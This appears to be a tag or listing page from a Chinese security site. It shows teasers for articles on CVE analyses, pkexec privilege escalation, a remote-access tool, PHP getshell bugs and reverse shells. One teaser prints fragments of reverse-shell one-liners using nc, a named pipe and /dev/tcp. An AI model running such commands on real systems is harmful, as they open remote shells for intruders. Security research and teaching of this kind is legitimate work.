el | CN-SEC 中文网

IoT工控物联网

CVE-2023-38902的详细研究

一前言这是我收获的第一个CVE编号，在复现了winmt师傅的CVE-2023-34644后，他告诉我最新的固件虽然做了一些简单的处理，导致无法在未授权的情况下RCE，但因为没有从根源上对命令执行点...

02月13日62 views评论

阅读全文

安全文章

CVE-2023-39785堆栈溢出漏洞分析

0x00 漏洞信息 Tenda AC8V4 V16.03.34.06版本中存在一个堆栈溢出漏洞，该漏洞位于set_qosMib_list函数的list参数中。漏洞严重性评分（CVSS）：未提供指定...

12月16日53 views评论

阅读全文

安全工具

命令行扫描器 -- scalpel

===================================免责声明请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负...

01月24日50 views评论

阅读全文

安全漏洞

CVE-2021-4034:pkexec本地提权

影响范围Debain stretch policykit-1 < 0.105-18+deb9u2Debain buster policykit-1 < 0.105-25+deb10u1De...

03月09日110 views评论

阅读全文

GUN sed高级用法，sed脚本编写

这里举一些sed常用的高级用法例子经供参考：一下操作都针对file.txt文件作修改[root@QX-VPN ~]# cat file.txtlibgcc-4.4.7-4.el6.x86_64setu...

09月07日安全闲碎58 views评论

阅读全文

安全工具

神兵利器 - RAT-el

RAT-el是一个开放源代码渗透测试工具，可让您控制Windows计算机。 &n...

05月26日86 views评论

阅读全文

安全文章

内网渗透——反弹shell详解

声明：文章技术仅供网络安全技术人员及白帽子使用，任何个人或组织不可用于违法犯罪，一经发现直接上报国家安全机关处理。

04月17日56 views评论

阅读全文

星光贴吧 1.3 后台拿 Shell

星光贴吧 1.3 后台拿SHEL by:风之传说今天分析了两个程序，都发了吧。。好吧，我承认有点鸡肋。。我们先来看看这个文件 Common/common.function.php： functi...

04月03日lcx41 views评论

阅读全文

lcx

狂盗小说小偷 GET Shell 漏洞

By：Cond0r 很傻比的一漏洞必须开启缓存才能利用先看代码 book.php： $kd_cachedir = "./cache"; if($kd_book_cache=="ture"){//...

04月03日48 views评论

阅读全文

虐神百度小偷v1.0 前台GET SHELL

read.php 以下是引用片段： include( "require.php" ); if ( $cacheis == 1 && file_exists( "cache/read/"...

04月03日lcx47 views评论

阅读全文

linux 五种反弹SHELL

1. nc -e /bin/bash 2. mknod backpipe p; nc 0backpipe 3. /bin/bash -i > /dev/tcp// 0&1 4. mkno...

04月03日lcx36 views评论

阅读全文

微软识别出Kelihos僵尸网络的幕后黑手

在捣毁Kelihos僵尸网络四个月后，微软已经确定了这一网络毒瘤的幕后黑手，一位来自俄罗斯圣彼得堡的黑客Andrey N. Sabelnikov，他利用这个僵尸网络实现了大规模感染，从而发送垃圾邮件和...

04月03日lcx32 views评论

阅读全文

CVE-2023-38902的详细研究

CVE-2023-39785堆栈溢出漏洞分析

命令行扫描器 -- scalpel

CVE-2021-4034:pkexec本地提权

GUN sed高级用法，sed脚本编写

神兵利器 - RAT-el

内网渗透——反弹shell详解

星光贴吧 1.3 后台拿 Shell

狂盗小说小偷 GET Shell 漏洞

虐神百度小偷v1.0 前台GET SHELL

linux 五种反弹SHELL

微软识别出Kelihos僵尸网络的幕后黑手

在线咨询

微信